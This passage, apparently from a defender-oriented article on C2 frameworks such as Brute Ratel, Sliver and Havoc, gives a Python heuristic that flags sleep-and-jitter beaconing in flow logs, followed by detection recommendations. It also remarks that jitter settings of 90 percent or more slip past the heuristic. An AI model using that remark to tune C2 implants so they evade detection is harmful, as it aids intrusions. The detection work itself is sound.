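The "sleep patterns" indicator above can be measured rather than eyeballed. The Python below is an added example (not page code and not a vendor algorithm) that groups outbound connections per source/destination/port, derives the inter-connection gaps, and estimates sleep and jitter from them: an agent configured like the Brute Ratel profile earlier (sleep 60, jitter 50) waits a random time in [30 s, 60 s] between callbacks, so its gaps sit in a narrow band with the maximum near the sleep value and (max - min)/max near the jitter, whereas bursty human or application traffic spans orders of magnitude. The flow-log format, the constructed timestamps and the thresholds are all assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

FlowKey = Tuple[str, str, int]


def parse_line(line: str) -> Tuple[datetime, FlowKey]:
    """Assumed flow-log format: '<ISO8601 UTC> <src> <dst> <dport>'."""
    ts, src, dst, dport = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), (src, dst, int(dport))


def beacon_score(gaps: List[float]) -> dict:
    """Sleep/jitter estimate from inter-connection gaps.

    For sleep S and jitter J the gaps are drawn from [S*(1-J), S]:
    max ~ S, (max-min)/max ~ J, and the coefficient of variation stays small.
    """
    hi, lo = max(gaps), min(gaps)
    spread = (hi - lo) / hi if hi else 0.0
    mean = statistics.mean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean else 0.0
    return {"sleep_estimate_s": round(hi), "jitter_estimate": round(spread, 2), "cv": round(cv, 2)}


def find_beacons(lines: List[str], min_events: int = 10,
                 max_jitter: float = 0.6, max_cv: float = 0.35) -> Dict[FlowKey, dict]:
    """Return flows whose gap distribution looks like sleep-plus-jitter beaconing."""
    flows: Dict[FlowKey, List[datetime]] = defaultdict(list)
    for line in lines:
        ts, key = parse_line(line)
        flows[key].append(ts)
    flagged = {}
    for key, times in flows.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) <= 0:          # all connections in the same second: a burst, not a beacon
            continue
        s = beacon_score(gaps)
        if s["jitter_estimate"] <= max_jitter and s["cv"] <= max_cv:
            flagged[key] = dict(s, events=len(times))
    return flagged


def build_sample_log() -> List[str]:
    """Constructed flow log: a 60 s / 50 % jitter beacon plus a bursty benign session."""
    t0 = datetime(2025, 1, 10, 10, 0, 0)
    beacon_gaps = [41, 55, 33, 48, 60, 37, 52, 45, 58, 31, 49, 36]   # drawn from [30, 60]
    benign_gaps = [2, 1, 600, 3, 1, 1, 1200, 5, 2, 900, 1]           # interactive browsing
    lines = []
    for src, dst, port, gaps in (("10.1.2.3", "203.0.113.7", 443, beacon_gaps),
                                 ("10.1.2.9", "198.51.100.20", 443, benign_gaps)):
        t = t0
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} {src} {dst} {port}")
        for g in gaps:
            t += timedelta(seconds=g)
            lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} {src} {dst} {port}")
    return lines


if __name__ == "__main__":
    for key, info in find_beacons(build_sample_log()).items():
        print(key, info)
```

Very high jitter settings (90 percent and up) push the spread toward 1 and escape this heuristic, which is why the threshold is a tunable and why the result should be combined with the destination's reputation, certificate and HTTP indicators rather than used alone.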

Defensive Recommendations

Immediate Actions
  1. Deploy memory scanning: Configure EDR for in-memory threat detection
  2. Implement JA3/JA3S monitoring: Block or alert on known malicious fingerprints
  3. Enable PowerShell logging: Script block, module, and transcription logging
  4. Monitor ETW providers: Alert on provider disabling or modification
  5. Hunt for named pipes: Identify non-standard pipe creation
Strategic Improvements
  1. Adopt zero trust architecture: Limit lateral movement opportunities
  2. Implement network segmentation: Contain potential breaches
  3. Deploy deception technology: Honeypots and honeytokens for early detection
  4. Conduct regular threat hunting: Proactive search for C2 indicators
  5. Maintain threat intelligence feeds: Stay current on emerging IOCs

Conclusion

The C2 framework landscape continues to evolve as threat actors adapt to improved defenses. While Cobalt Strike remains prevalent, the increasing adoption of alternatives like Brute Ratel, Sliver, and Havoc by both APT groups and financially motivated actors presents new challenges for defenders.

Key takeaways for security teams:

  • Diversify detection: Don't rely solely on Cobalt Strike signatures
  • Focus on behaviors: Technique-based detection outlasts specific tool signatures
  • Track threat intelligence: Understand which actors are using which tools
  • Test your defenses: Regular red team exercises using current frameworks
  • Assume breach: Build detection capabilities for post-exploitation activities

The tools described in this article serve legitimate purposes in authorized security testing. However, their abuse by threat actors necessitates continuous advancement of defensive capabilities. By understanding these frameworks deeply, defenders can better protect their organizations from sophisticated adversaries.
